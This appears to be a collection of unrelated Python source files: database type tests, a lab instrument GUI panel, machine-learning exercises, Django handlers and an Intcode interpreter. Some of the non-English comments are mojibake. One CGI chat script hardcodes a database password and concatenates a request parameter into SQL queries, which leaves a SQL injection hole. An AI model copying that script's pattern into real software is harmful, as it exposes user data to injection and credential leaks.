skipif_no_geospatial_deps = pytest.mark.skipif(
not geospatial_supported, reason="geospatial dependencies not installed"
)
broken_sqlalchemy_autoload = pytest.mark.xfail(
reason="scale not inferred by sqlalchemy autoload"
)
@pytest.mark.parametrize(
("server_type", "expected_type"),
DB_TYPES
+ [
param("GEOMETRY", dt.geometry, marks=[skipif_no_geospatial_deps]),
param("GEOGRAPHY", dt.geography, marks=[skipif_no_geospatial_deps]),
]
+ [
param(
"DATETIME2(4)", dt.timestamp(scale=4), marks=[broken_sqlalchemy_autoload]
),
param(
"DATETIMEOFFSET(5)",
dt.timestamp(scale=5, timezone="UTC"),
marks=[broken_sqlalchemy_autoload],
),
],
ids=str,
)
def test_get_schema_from_query(con, server_type, expected_type, temp_table):
expected_schema = ibis.schema(dict(x=expected_type))
with con.begin() as c:
c.exec_driver_sql(f"CREATE TABLE [{temp_table}] (x {server_type})")
expected_schema = ibis.schema(dict(x=expected_type))
result_schema = con._get_schema_using_query(f"SELECT * FROM [{temp_table}]")
assert result_schema == expected_schema
t = con.table(temp_table)
assert t.schema() == expected_schema
|
486 | 25aa0766505b22588107d44e15c3596e9383d4e9 | import datetime
from ..core.indicator import Indicator, IndicatorState
from ..core.toolwindow import ToolWindow
class HaakePhoenix(ToolWindow):
required_devices = ['haakephoenix']
def __init__(self, *args, **wargs):
self.indicators = {}
super().__init__(*args, **wargs)
def init_gui(self, *args, **kwargs):
statusgrid = self.builder.get_object('statusgrid')
for row, column, vn, label in [(0, 0, '_status', 'Status'),
(0, 1, 'setpoint', 'Target temperature'),
(0, 2, 'temperature', 'Temperature'),
(0, 3, 'pump_power', 'Pump speed'),
(0, 4, 'control_on', 'Temperature control'),
(1, 0, 'lowlimit', 'Low limit'),
(1, 1, 'highlimit', 'High limit'),
(1, 2, 'cooling_on', 'Cooling'),
(1, 3, 'control_external', 'Control'),
(1, 4, 'diffcontrol_on', 'Differential control')]:
self.indicators[vn] = Indicator(label, '--', IndicatorState.UNKNOWN)
statusgrid.attach(self.indicators[vn], column, row, 1, 1)
errorgrid = self.builder.get_object('errorgrid')
for row, column, vn, label in [(0, 0, 'external_pt100_error', 'External Pt100'), #
(0, 1, 'internal_pt100_error', 'Internal Pt100'), #
(0, 2, 'liquid_level_low_error', 'Liquid level'), #
(0, 3, 'liquid_level_alarm_error', 'Liquid level alarm'), #
(0, 4, 'cooling_error', 'Cooling system'), #
(1, 0, 'pump_overload_error', 'Pump'), #
(1, 1, 'external_alarm_error', 'External alarm'), #
(1, 2, 'overtemperature_error', 'Overtemperature'), #
(1, 3, 'main_relay_missing_error', 'Main relay'), #
(1, 4, 'faultstatus', 'Status flags')]: #
self.indicators[vn] = Indicator(label, '--', IndicatorState.UNKNOWN)
errorgrid.attach(self.indicators[vn], column, row, 1, 1)
othergrid = self.builder.get_object('othergrid')
for row, column, vn, label in [(0, 0, 'firmwareversion', 'Firmware version'), #
(0, 1, 'date', 'Date'), #
(0, 2, 'time', 'Time'), #
(0, 3, 'autostart', 'Autostart'), #
(0, 4, 'beep', 'Beep'), #
(1, 0, 'fuzzyid', 'Fuzzy identification'), #
(1, 1, 'fuzzycontrol', 'Fuzzy control'), #
(1, 2, 'fuzzystatus', 'Fuzzy status'), #
(1, 3, 'watchdog_on', 'Watchdog'), #
(1, 4, 'watchdog_setpoint', 'Watchdog setpoint')]: #
self.indicators[vn] = Indicator(label, '--', IndicatorState.UNKNOWN)
othergrid.attach(self.indicators[vn], column, row, 1, 1)
self.update_indicators()
def on_mainwidget_map(self, window):
if super().on_mainwidget_map(window):
return True
self.update_indicators()
def update_indicators(self):
dev = self.instrument.get_device('haakephoenix')
for vn in self.indicators:
self.on_device_variable_change(dev, vn, dev.get_variable(vn))
self.builder.get_object('setpoint_adjustment').set_value(
dev.get_variable('setpoint'))
self.builder.get_object('lowlimit_adjustment').set_value(
dev.get_variable('lowlimit'))
self.builder.get_object('highlimit_adjustment').set_value(
dev.get_variable('highlimit'))
def on_device_variable_change(self, device, variablename, newvalue):
if variablename in ['_status', 'firmwareversion', 'fuzzycontrol', 'date', 'time', 'faultstatus']:
self.indicators[variablename].set_value(str(newvalue), IndicatorState.NEUTRAL)
elif variablename in ['setpoint', 'temperature', 'lowlimit', 'highlimit']:
self.indicators[variablename].set_value('%.2fยฐC' % newvalue, IndicatorState.NEUTRAL)
elif variablename in ['control_on', 'cooling_on', 'diffcontrol_on', 'watchdog_on', 'beep', 'fuzzyid',
'fuzzystatus',
'autostart']:
self.indicators[variablename].set_value(['OFF', 'ON'][int(bool(newvalue))],
[IndicatorState.ERROR, IndicatorState.OK][int(bool(newvalue))])
elif variablename in ['pump_power']:
self.indicators[variablename].set_value('%.2f %%' % newvalue,
[IndicatorState.ERROR, IndicatorState.OK][newvalue > 0])
elif variablename in ['external_pt100_error', 'internal_pt100_error', 'liquid_level_low_error', 'cooling_error',
'main_relay_missing_error']:
self.indicators[variablename].set_value(['OK', 'ERROR'][int(bool(newvalue))],
[IndicatorState.OK, IndicatorState.ERROR][int(bool(newvalue))])
elif variablename in ['liquid_level_alarm_error', 'external_alarm_error', 'overtemperature_error']:
self.indicators[variablename].set_value(['OK', 'ALARM'][int(bool(newvalue))],
[IndicatorState.OK, IndicatorState.ERROR][int(bool(newvalue))])
elif variablename in ['pump_overload_error']:
self.indicators[variablename].set_value(['OK', 'OVERLOAD'][int(bool(newvalue))],
[IndicatorState.OK, IndicatorState.ERROR][int(bool(newvalue))])
elif variablename in ['watchdog_setpoint']:
self.indicators[variablename].set_value('%.2f sec' % newvalue, IndicatorState.UNKNOWN)
elif variablename in ['control_external']:
self.indicators[variablename].set_value(['Internal', 'External'][int(bool(newvalue))],
IndicatorState.NEUTRAL)
if variablename == 'fuzzyid':
self.builder.get_object('fuzzyid_switch').set_state(bool(newvalue))
elif variablename == 'pump_power':
self.builder.get_object('circulator_switch').set_state(newvalue > 0)
return False
def on_circulator_switch_state_set(self, switch, state):
dev = self.instrument.get_device('haakephoenix')
if state:
dev.execute_command('start')
else:
dev.execute_command('stop')
return True
def on_fuzzyid_switch_state_set(self, switch, state):
self.instrument.get_device('haakephoenix').set_variable('fuzzyid', state)
return True
def on_set_setpoint(self, button):
spinbutton = self.builder.get_object('setpoint_spin')
self.instrument.get_device('haakephoenix').set_variable('setpoint', spinbutton.get_value())
def on_set_lowlimit(self, button):
spinbutton = self.builder.get_object('lowlimit_spin')
self.instrument.get_device('haakephoenix').set_variable('lowlimit', spinbutton.get_value())
def on_set_highlimit(self, button):
spinbutton = self.builder.get_object('highlimit_spin')
self.instrument.get_device('haakephoenix').set_variable('highlimit', spinbutton.get_value())
def on_update_rtc(self, button):
now = datetime.datetime.now()
self.instrument.get_device('haakephoenix').set_variable('date', now.date())
self.instrument.get_device('haakephoenix').set_variable('time', now.time())
|
487 | de6b9961e0572338c87802314e7ae3cded5168b4 | import matplotlib.pyplot as plt
import numpy as np
import scipy.io as scio
import estimateGaussian as eg
import multivariateGaussian as mvg
import visualizeFit as vf
import selectThreshold as st
plt.ion()
# np.set_printoptions(formatter={'float': '{: 0.6f}'.format})
'''็ฌฌ1้จๅ ๅ ่ฝฝ็คบไพๆฐๆฎ้'''
#ๅ
้่ฟไธไธชๅฐๆฐๆฎ้่ฟ่กๅผๅธธๆฃๆต ไพฟไบๅฏ่งๅ
# ๆฐๆฎ้ๅ
ๅซไธคไธช็นๅพ
# ไธไบๆบๅจ็็ญๅพ
ๆถ้ดๅๅๅ้ ๅฎ้ช็ฎ็ๆพๅบๅ
ถไธญๅฏ่ฝๆๅผๅธธ็ๆบๅจ
print('Visualizing example dataset for outlier detection.')
data = scio.loadmat('ex8data1.mat')
X = data['X']#่ฎญ็ป้ๆ ทๆฌ็นๅพ็ฉ้ต
Xval = data['Xval'] #้ช่ฏ้ๆ ทๆฌ็นๅพ็ฉ้ต
yval = data['yval'].flatten() #้ช่ฏ้ๆ ทๆฌๆ ็ญพ ๅผๅธธ/ๆญฃๅธธ
# ๅฏ่งๅๆ ทไพ่ฎญ็ป้
plt.figure()
plt.scatter(X[:, 0], X[:, 1], c='b', marker='x', s=15, linewidth=1)
plt.axis([0, 30, 0, 30])
plt.xlabel('Latency (ms)') #x1็ญๅพ
ๆถ้ด
plt.ylabel('Throughput (mb/s') #x2ๅๅ้
input('Program paused. Press ENTER to continue')
'''็ฌฌ2้จๅ ไผฐ่ฎก่ฎญ็ป้็ๅๅธ'''
# ๅ่ฎพๆฐๆฎ้็ๅไธช็นๅพๆไป้ซๆฏๅๅธ
print('Visualizing Gaussian fit.')
# ๅๆฐไผฐ่ฎก
mu, sigma2 = eg.estimate_gaussian(X)
# ่ฎก็ฎ่ฎญ็ป้็ๆฆ็ๅๅธ
p = mvg.multivariate_gaussian(X, mu, sigma2)
#ๅฏ่งๅ่ฎญ็ป้็ๆฆ็ๅๅธ ็ปๅบ็ญ้ซ็บฟๅพ
vf.visualize_fit(X, mu, sigma2)
plt.xlabel('Latency (ms)')
plt.ylabel('Throughput (mb/s')
input('Program paused. Press ENTER to continue')
'''็ฌฌ3้จๅ ๅบไบ้ช่ฏ้ ๅพๅฐไธไธชๆๅฅฝ็ๆฆ็ๅๅธ้ๅผ'''
pval = mvg.multivariate_gaussian(Xval, mu, sigma2) #ๆ นๆฎ่ฎญ็ป้็ๆฆ็ๅๅธ ๅพๅฐ้ช่ฏ้ๆ ทๆฌ็ๆฆ็
epsilon, f1 = st.select_threshold(yval, pval) #้ๆฉๅ้็ๆฆ็้ๅผ
print('Best epsilon found using cross-validation: {:0.4e}'.format(epsilon))
print('Best F1 on Cross Validation Set: {:0.6f}'.format(f1))
print('(you should see a value epsilon of about 8.99e-05 and F1 of about 0.875)')
# ๆ ๅบ่ฎญ็ป้ไธญ็ๅผๅธธๅผ
outliers = np.where(p < epsilon)
plt.scatter(X[outliers, 0], X[outliers, 1], marker='o', facecolors='none', edgecolors='r')
input('Program paused. Press ENTER to continue')
'''็ฌฌ4้จๅ ๅบไบๅคงๆฐๆฎ้ ่ฟ่กๅผๅธธๆฃๆต๏ผ็นๅพๆฐๅพๅค๏ผ'''
data = scio.loadmat('ex8data2.mat')
X = data['X'] #่ฎญ็ป้ๆ ทๆฌ็นๅพ็ฉ้ต
Xval = data['Xval'] #้ช่ฏ้ๆ ทๆฌ็นๅพ็ฉ้ต
yval = data['yval'].flatten() #้ช่ฏ้ๆ ทๆฌๆ ็ญพ 1ๅผๅธธ 0ๆญฃๅธธ
#ๅๆฐไผฐ่ฎก
mu, sigma2 = eg.estimate_gaussian(X)
# ่ฎก็ฎ่ฎญ็ป้็ๆฆ็ๅๅธ
p = mvg.multivariate_gaussian(X, mu, sigma2)
# ๅพๅฐ้ช่ฏ้ๆฏไธชๆ ทๆฌ็ๆฆ็
pval = mvg.multivariate_gaussian(Xval, mu, sigma2)
# ้ๆฉไธไธชๆๅฅฝ็้ๅผ
epsilon, f1 = st.select_threshold(yval, pval)
#้ช่ฏ็จๅบๆญฃ็กฎๆง
print('Best epsilon found using cross-validation: {:0.4e}'.format(epsilon))
print('Best F1 on Cross Validation Set: {:0.6f}'.format(f1))
print('# Outliers found: {}'.format(np.sum(np.less(p, epsilon)))) #่ฎญ็ป้ไธ็ๅผๅธธๆ ทๆฌๆฐ้
print('(you should see a value epsilon of about 1.38e-18, F1 of about 0.615, and 117 outliers)')
input('ex8 Finished. Press ENTER to exit')
|
488 | e37e468d8a41b8711fb0eb4ddec7db67691f9156 | '''
Created on 3 Jul 2009
@author: charanpal
An abstract base class which represents a graph generator. The graph generator
takes an existing empty graph and produces edges over it.
'''
from apgl.util.Util import Util
class AbstractGraphGenerator(object):
def generate(self, graph):
Util.abstract() |
489 | dc226a646af32d052c6d51832b95a340d6986e08 |
print('\n')
# ะะตัะฒัะน ะฒะฐัะธะฐะฝั
def fn1():
print("One")
def fn2():
print("Two")
def fn3():
print("Three")
fndict = {"A": fn1, "B": fn2, "C": fn3}
keynames = ["A", "B", "C"]
fndict[keynames[1]]()
fndict['C']()
# ะัะพัะพะน ะฒะฐัะธะฐะฝั
def add(one,two):
c = one+two
print(c)
print(type(c))
def sub(one,two):
c = one-two
print(c)
print(type(c))
trainee = {1:add, 2:sub}
trainee[1](10,4)
print('\n PROVERKA TIPA', type(trainee[1]))
print('\n PROVERKA TIPA', type(trainee[1](10,4)))
|
490 | a491772258a52bdfc93083343d2a2e48a240340d | # -*- coding:utf-8 -*-
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Metric of classifier task."""
from functools import partial
from vega.metrics.pytorch.metrics import MetricBase
from vega.common import ClassFactory, ClassType
import sklearn.metrics as me
def accuracy(output, target, top_k=(1,)):
"""Calculate classification accuracy between output and target.
:param output: output of classification network
:type output: pytorch tensor
:param target: ground truth from dataset
:type target: pytorch tensor
:param top_k: top k of metric, k is an interger
:type top_k: tuple of interger
:return: results of top k
:rtype: list
"""
labels_count = output.shape[1]
max_k = labels_count if max(top_k) > labels_count else max(top_k)
batch_size = target.size(0)
_, pred = output.topk(max_k, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in top_k:
correct_k = correct[:k].reshape(-1).float().sum(0)
res.append(correct_k / batch_size)
return res
@ClassFactory.register(ClassType.METRIC, alias='accuracy')
class Accuracy(MetricBase):
"""Calculate classification accuracy between output and target."""
__metric_name__ = 'accuracy'
def __init__(self, topk=(1, 5)):
"""Init Accuracy metric."""
self.topk = topk
self.sum = [0.] * len(topk)
self.data_num = 0
self.pfm = [0.] * len(topk)
def __call__(self, output, target, *args, **kwargs):
"""Perform top k accuracy.
:param output: output of classification network
:param target: ground truth from dataset
:return: pfm
"""
if isinstance(output, tuple):
output = output[0]
if isinstance(target, tuple) or isinstance(target, list):
target = target[0]
res = accuracy(output, target, self.topk)
n = output.size(0)
self.data_num += n
self.sum = [self.sum[index] + item.item() * n for index, item in enumerate(res)]
self.pfm = [item / self.data_num for item in self.sum]
return res
def reset(self):
"""Reset states for new evaluation after each epoch."""
self.sum = [0.] * len(self.topk)
self.data_num = 0
self.pfm = [0.] * len(self.topk)
def summary(self):
"""Summary all cached records, here is the last pfm record."""
if len(self.pfm) == 1:
return self.pfm[0]
perf_dict = {}
perf_dict[self.name] = self.pfm[0]
perf_dict.update({'{}_top{}'.format(self.name, self.topk[idx]): value for idx, value in enumerate(self.pfm)})
return perf_dict
@ClassFactory.register(ClassType.METRIC)
class SklearnMetrics(MetricBase):
"""Wrapper class for Sklearn Metrics."""
def __init__(self, name, **kwargs):
super().__init__()
self.__metric_name__ = name
self.metric_func = getattr(me, name)
if kwargs:
self.metric_func = partial(self.metric_func, kwargs)
def __call__(self, output, target, *args, **kwargs):
"""Perform top k accuracy.
:param output: output of classification network
:param target: ground truth from dataset
:return: pfm
"""
_, y_pred = output.topk(1, 1, True, True)
y_pred = y_pred.t().detach().cpu().numpy()[0]
y_true = target.detach().cpu().numpy()
self.pfm = self.metric_func(y_true, y_pred)
return self.pfm
def reset(self):
"""Reset states for new evaluation after each epoch."""
pass
def summary(self):
"""Summary all cached records, here is the last pfm record."""
return self.pfm
|
491 | 2b8ca0c8c7878536da4f31652976988cdba62d89 | from django.contrib import admin
from main_app.models import sites, statuses, redirects
# Register your models here.
admin.site.register(statuses)
admin.site.register(sites)
admin.site.register(redirects) |
492 | 19bb58ab440ca00bf6410a70a8b6bbc24eec96c1 | from django.apps import AppConfig
class MarketingemailsConfig(AppConfig):
name = 'marketingemails'
|
493 | 1614157c57b3d1b30087c42cb840d617dc91eecb | # Bengisu Ayan - 2236974
# Ceren Gรผrsoy - 2237485
import numpy as np
import cv2
B1 = "THE3-Images/B1.jpg"
B2 = "THE3-Images/B2.jpg"
B3 = "THE3-Images/B3.jpg"
B4 = "THE3-Images/B4.jpg"
B5 = "THE3-Images/B5.jpg"
def segmentation_function(image, name, blue_mask=False, white_mask=False, yellow_mask=False):
# Smooth the image
image = cv2.GaussianBlur(image,(11,11),0)
# convert to HSV color system
hsv_image = cv2.cvtColor(image, cv2.COLOR_RGB2HSV)
# define green mask
# green is applied to all the images as the dogs are all in grass
low_green = np.array([30, 0, 0])
high_green = np.array([86, 255, 255])
mask_final = cv2.inRange(hsv_image, low_green, high_green)
# define blue mask and apply it
if blue_mask == True:
low_blue = np.array([80, 0, 0])
high_blue = np.array([125, 255, 255])
mask_blue = cv2.inRange(hsv_image, low_blue, high_blue)
mask_final = mask_final + mask_blue
# define white mask and apply it
if white_mask == True:
low_white = np.array([0, 0, 200])
high_white = np.array([145,60,255])
mask_white = cv2.inRange(hsv_image, low_white, high_white)
mask_final = mask_final + mask_white
# define yellow mask and apply it
if yellow_mask == True:
low_yellow = np.array([10, 0, 0])
high_yellow = np.array([33, 255, 100])
mask_yellow = cv2.inRange(hsv_image, low_yellow, high_yellow)
mask_final = mask_final + mask_yellow
# make object white and background black
mask_final = 255 - mask_final
# apply opening to final mask
# define 27*27 elliptical structuring element for opening
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(27,27))
# apply opening
mask_final = cv2.morphologyEx(mask_final, cv2.MORPH_OPEN, kernel)
# apply closing to final mask
# define 41*41 elliptical structuring element for opening
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(41,41))
# apply closing
mask_final = cv2.morphologyEx(mask_final, cv2.MORPH_CLOSE, kernel)
# get biggest connected component
segmented_image = np.zeros_like(mask_final)
for val in np.unique(mask_final)[1:]:
mask = np.uint8(mask_final == val)
labels, stats = cv2.connectedComponentsWithStats(mask, 4)[1:3]
largest_label = 1 + np.argmax(stats[1:, cv2.CC_STAT_AREA])
segmented_image[labels == largest_label] = val
return segmented_image
# Read B1
image_bgr = cv2.imread(B1)
# convert B1 from bgr to rgb
image = cv2.cvtColor(image_bgr, cv2.COLOR_BGR2RGB)
# Apply segmentation to B1 with only green mask
segmented_image = segmentation_function(image, 'B1', blue_mask=False, white_mask=False, yellow_mask=False)
cv2.imwrite("the3_B1_output.png", segmented_image)
# Read B2
image_bgr = cv2.imread(B2)
# convert B2 from bgr to rgb
image = cv2.cvtColor(image_bgr, cv2.COLOR_BGR2RGB)
# Apply segmentation to B2 with green, white, yellow and blue masks
segmented_image = segmentation_function(image,'B2', blue_mask=True, white_mask=True, yellow_mask=True)
cv2.imwrite("the3_B2_output.png", segmented_image)
# Read B3
image_bgr = cv2.imread(B3)
# convert B3 from bgr to rgb
image = cv2.cvtColor(image_bgr, cv2.COLOR_BGR2RGB)
# Apply segmentation to B3 with green and blue masks
segmented_image = segmentation_function(image,'B3', blue_mask=True, white_mask=False, yellow_mask=False)
cv2.imwrite("the3_B3_output.png", segmented_image)
# Read B4
image_bgr = cv2.imread(B4)
# convert B4 from bgr to rgb
image = cv2.cvtColor(image_bgr, cv2.COLOR_BGR2RGB)
# Apply segmentation to B4 with green and blue masks
segmented_image = segmentation_function(image,'B4', blue_mask=True, white_mask=False, yellow_mask=False)
cv2.imwrite("the3_B4_output.png", segmented_image)
# Read B5
image_bgr = cv2.imread(B5)
# convert B5 from bgr to rgb
image = cv2.cvtColor(image_bgr, cv2.COLOR_BGR2RGB)
# Apply segmentation to B2 with green ,yellow and blue masks
segmented_image = segmentation_function(image,'B5', blue_mask=True, white_mask=False, yellow_mask=True)
cv2.imwrite("the3_B5_output.png", segmented_image)
|
494 | 065a566b3e520c14f20d0d7d668ec58404d6e11b | # coding=utf-8
# Copyright 2016 Mystopia.
from __future__ import (absolute_import, division, generators, nested_scopes,
print_function, unicode_literals, with_statement)
from django.db.models.signals import m2m_changed, post_save
from django.dispatch import receiver
from dicpick.models import Task, TaskType
# The signal handlers below ensure that certain changes to TaskType are reflected onto all the tasks of that type.
# Note that the signal handlers run in the same transaction as the event that triggered the signal.
@receiver(post_save, sender=TaskType)
def create_task_instances(sender, instance, **kwargs):
"""Ensure that there is a task instance for each date in the range specified by the task type.
Necessary to support date range changes.
"""
task_type = instance
existing_dates = set([task.date for task in task_type.tasks.all()])
required_dates = set(task_type.date_range())
missing_dates = required_dates - existing_dates
superfluous_dates = existing_dates - required_dates
Task.objects.filter(task_type=task_type, date__in=superfluous_dates).delete()
for missing_date in missing_dates:
task = Task(task_type=task_type, date=missing_date, num_people=task_type.num_people, score=task_type.score)
task.save()
Task.objects.filter(task_type=task_type).update(num_people=task_type.num_people, score=task_type.score)
@receiver(m2m_changed, sender=TaskType.tags.through)
def tags_updated(sender, instance, action, **kwargs):
"""If tags were added to or removed from a TaskType, add/remove them from all tasks of that type."""
task_type = instance
pk_set = kwargs.pop('pk_set')
if action == 'post_add':
for task in task_type.tasks.all():
task.tags.add(*pk_set)
elif action == 'post_remove':
for task in task_type.tasks.all():
task.tags.remove(*pk_set)
|
495 | dc88686d3cbb4223b4de6847bf4fc29b93054b00 | #! /usr/bin/env python3
import EchooFunctions, cgi, MySQLdb, hashlib, time, requests, os
print ('Content-type: text/html\n')
form = cgi.FieldStorage()
#database connection
user = "i494f18_team34"
db_pass = "my+sql=i494f18_team34"
db_con = MySQLdb.connect(host="db.soic.indiana.edu", port = 3306, user=user, passwd=db_pass, db=user)
cursor = db_con.cursor()
receiverID = form.getfirst('user','')
userName = ""
userID = ""
if "echooUser" in str(os.environ):
userName = EchooFunctions.getUserName()
userName = userName[0]
userID = EchooFunctions.getUserID(cursor, userName)
admin = False
#change the status of veriable
if userName != "":
if EchooFunctions.checkUserType(cursor, userName) == "administrator":
admin = True
#main contents to insert
friend = ""
friendList = ""
chatroom = ""
userList = []
if userID != "" and receiverID !="":
try:
SQL = "select u.userID, u.username, u.icon, m.detail, m.time_in,m.messageID from user as u, private_message as m where u.userID = "
SQL+= "m.sender and m.receiver = "+str(userID)+" and m.sender = "+str(receiverID)
SQL+= " Union select u.userID, u.username, u.icon, m.detail, m.time_in ,m.messageID from user as u, private_message as m where u.userID = "
SQL+= "m.sender and m.receiver = "+str(receiverID)+" and m.sender = "+str(userID)
SQL+=" Order By messageID ;"
cursor.execute(SQL)
results = cursor.fetchall()
except Exception as e:
print('<p>Something went wrong with the first SQL!</p>')
print(SQL, "Error:", e)
else:
if results:
count = 5
for row in results:
word_count = 0
specialChar=row[3]
specialChar2 = ""
specialChar=EchooFunctions.returnSpecialChara(specialChar)
for x in specialChar:
if word_count<=20:
specialChar2 += x
word_count+=1
else:
specialChar2 += x +"<p>"
word_count = 0
if count >= 5:
chatroom+='<li class="chatDate">'+str(row[4])+'</li>'
count=0
if str(row[0]) ==str(userID):
count+=1
chatroom+='<li class="mainUser">'+'<a href="userProfile.cgi?user='+str(row[0])+'">'+row[1]+'</a><img src="images/user/'+row[2]+'" alt="club1">'
chatroom+='<br><div class="messageLine">'+specialChar2+'</div></li>'
else:
count+=1
chatroom+='<li class="otherUser"><img src="images/user/'+row[2]+'" alt="club1">'
chatroom+='<a href="userProfile.cgi?userid='+str(row[0])+'">'+row[1]+'</a><br><div class="messageLine">'+specialChar2+'</div></li>'
if userID == "" or receiverID =="":
content ="""<p>You don't have right access to this page</p>
<a href='index.cgi'></a>"""
print(content)
print(chatroom)
|
496 | 653e65281984ebb06467aeadb6f0e2b11f1bcb4d | #!/usr/bin/python3
def file_to_code(fname):
mem = []
for line in open(fname,"r"):
mem.extend([int(i) for i in line.split(",")])
return mem
class Opcode(object):
def __init__(self, mem, ptr, code, inc):
"""
>>> o = Opcode([1001, 2, 4, 1], 0, 1, 4)
>>> o._Opcode__par_modes
[0, 1]
"""
if mem[ptr]%100 != code:
raise Exception("Creating Opcode%d for opcode %d"%(code, mem[ptr]))
self.memory = mem
self.ptr = ptr
self.__par_modes = list(reversed([int(i) for i in str(int(mem[ptr]/100))]))
self.__ptr_inc = inc
def ptr_inc(self):
return self.__ptr_inc
def get_val(self, arg_idx):
"""
>>> o = Opcode([1001, 2, 4, 1], 0, 1, 4)
>>> o.get_val(1)
4
>>> o.get_val(2)
4
>>> o.get_val(3)
2
"""
idx = arg_idx-1
if idx >= len(self.__par_modes) or self.__par_modes[idx] == 0:
return self.memory[self.memory[self.ptr+arg_idx]]
elif self.__par_modes[idx] == 1:
return self.memory[self.ptr + arg_idx]
def set_ptr(self):
return False,0
def reads(self):
raise Exception("Call to base class reads()")
def writes(self):
raise Exception("Call to base class writes()")
def op(self):
raise Exception("Call to base class op()")
def params(self):
raise Exception("Call to base class params()")
def run(self):
raise Exception("Call to base class run()")
class Opcode1(Opcode):
"""
>>> o = Opcode1([101, 2, 1, 3], 0)
>>> o.run()
True
>>> o.memory
[101, 2, 1, 4]
"""
def __init__(self, mem, ptr):
super().__init__(mem, ptr, 1, 4)
self.__first = self.get_val(1)
self.__second = self.get_val(2)
self.__res = mem[ptr+3]
def run(self):
self.memory[self.__res] = self.__first + self.__second
return True
def params(self):
return {'noun':self.__first, 'verb':self.__second, 'result':self.__res}
def reads(self):
return [self.__first, self.__second]
def writes(self):
return self.__res
def op(self):
return "+"
def __str__(self):
return "loc[%d] = %d + %d"%(self.__res,self.__first,self.__second)
class Opcode2(Opcode):
"""
>>> o = Opcode2([2, 2, 3, 4, 99], 0)
>>> o.run()
True
>>> o.memory
[2, 2, 3, 4, 12]
"""
def __init__(self, mem, ptr):
super().__init__(mem, ptr, 2, 4)
self.__first = self.get_val(1)
self.__second = self.get_val(2)
self.__res = mem[ptr+3]
def run(self):
self.memory[self.__res] = self.__first * self.__second
return True
def params(self):
return {'noun':self.__first, 'verb':self.__second, 'result':self.__res}
def reads(self):
return [self.__first, self.__second]
def writes(self):
return self.__res
def op(self):
return "*"
def __str__(self):
return "loc[%d] = %d * %d"%(self.__res,self.__first,self.__second)
class Opcode99(Opcode):
"""
>>> o = Opcode99([99,12,3,4,5], 0)
>>> o.run()
False
"""
def __init__(self, mem, ptr):
super().__init__(mem, ptr, 99, 1)
def run(self):
return False
def params(self):
return {}
def reads(self):
return []
def writes(self):
return None
def op(self):
return "HALT"
def __str__(self):
return "HALT"
def default_ops():
return {1:Opcode1,2:Opcode2,99:Opcode99}
class Interpreter(object):
def __init__(self, input_code, ops=default_ops()):
self.__memory = input_code
self.__ops = ops
self.__ptr = 0
self.__running = True
self.length = len(self.__memory)
def stepi(self):
o = None
if self.__running:
o = self.next_op()
self.__running = o.run()
chk,val = o.set_ptr()
if chk:
self.__ptr = val
else:
self.__ptr += o.ptr_inc()
return o
def run(self):
while self.__running:
self.stepi()
def inspect(self,loc):
return self.__memory[loc]
def next_op(self):
return self.op_at(self.__ptr)
def op_at(self, ptr):
return self.__ops[self.__memory[ptr] % 100](self.__memory, ptr)
def __str__(self):
strs = []
for i,v in enumerate(self.__memory):
if i == self.__ptr:
strs.append("{:*>4}".format(v))
else:
strs.append("{:>4}".format(v))
return ",".join(strs) + "\n" + "Next:\n\t" + str(self.next_op())
def poke(self,loc,val):
self.__memory[loc] = val
def rebind(self,code,call):
self.__ops[code] = call
def as_opcodes(self):
ops = [self.op_at(0)]
ptr = ops[-1].ptr_inc()
while ops[-1].op() != "HALT":
ops.append(self.op_at(ptr))
ptr += ops[-1].ptr_inc()
return ops
class ValueNode(object):
def __init__(self,val,tag=''):
self.__val = val
self.__tag = tag
def __str__(self):
return self.__tag + str(self.__val)
class OpNode(object):
def __init__(self,op,depends):
self.__op = op
self.__depends = depends
def __str__(self):
return "(" + self.__op.op().join([str(i) for i in self.__depends]) + ")"
class OpcodeTreeBuilder(object):
def __init__(self, interp):
self.__interpreter = interp
self.__codes = interp.as_opcodes()
def construct_mappings(self):
for i in self.__codes:
params = i.params()
if 'result' in params.keys():
if params['result'] not in self.__writes_to.keys():
self.__writes_to[params['result']] = []
self.__writes_to[params['result']].append(i)
if 'noun' in params.keys():
if params['noun'] not in self.__reads_from.keys():
self.__reads_from[params['noun']] = []
self.__reads_from[params['noun']].append(i)
if 'verb' in params.keys():
if params['verb'] not in self.__reads_from.keys():
self.__reads_from[params['verb']] = []
self.__reads_from[params['verb']].append(i)
def construct_graph(self):
op = self.__interpreter.op_at(0)
reads = [ValueNode(self.__interpreter.inspect(i),tag="raw%d_"%(i)) for i in op.reads()]
writes = op.writes()
base = OpNode(op,reads)
ptr = op.ptr_inc()
last_write = {}
if writes:
last_write[writes] = base
while op.op() != "HALT":
op = self.__interpreter.op_at(ptr)
if op.op() == "HALT":
break
depends = []
for i in op.reads():
if i in last_write.keys():
depends.append(last_write[i])
else:
depends.append(ValueNode(self.__interpreter.inspect(i)))
base = OpNode(op,depends)
if op.writes():
last_write[op.writes()] = base
ptr += op.ptr_inc()
return base
if __name__=='__main__':
import doctest
doctest.testmod()
#################################################
# i = Interpreter(file_to_code("day2_input.txt"))
# i.run()
# i.inspect(0)
|
497 | 8d5b75dc945844d48f52159be08fc1e6aa51fdf5 | # Takes in a word and makes a list containing individual characters
def split(word):
return [char for char in word]
# Removes empty strings from a list
def removeEmptyStrings(lst):
while "" in lst:
lst.remove("")
ints = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
tokenList = []
class Token:
def __init__(self, token, value):
self.token = token
self.value = value
def display(self):
# Throws error if character is unknown
if self.token == 'ERROR':
error = Error('UnknownError', 'cannot identify character', str(self.value), 1, r'C:\Users\tanne\My_Codes\Python\ease_language\SAMPLE.py')
print(error.display())
# Displays token value pairs
else:
if self.token == 'STRING' or self.token == 'INT':
pair = f'{self.token}: {self.value}'
else:
pair = f'{self.token}'
return pair
# Adds token value pairs to list
def addToList(self):
tokenList.append(self.display())
class Lexer:
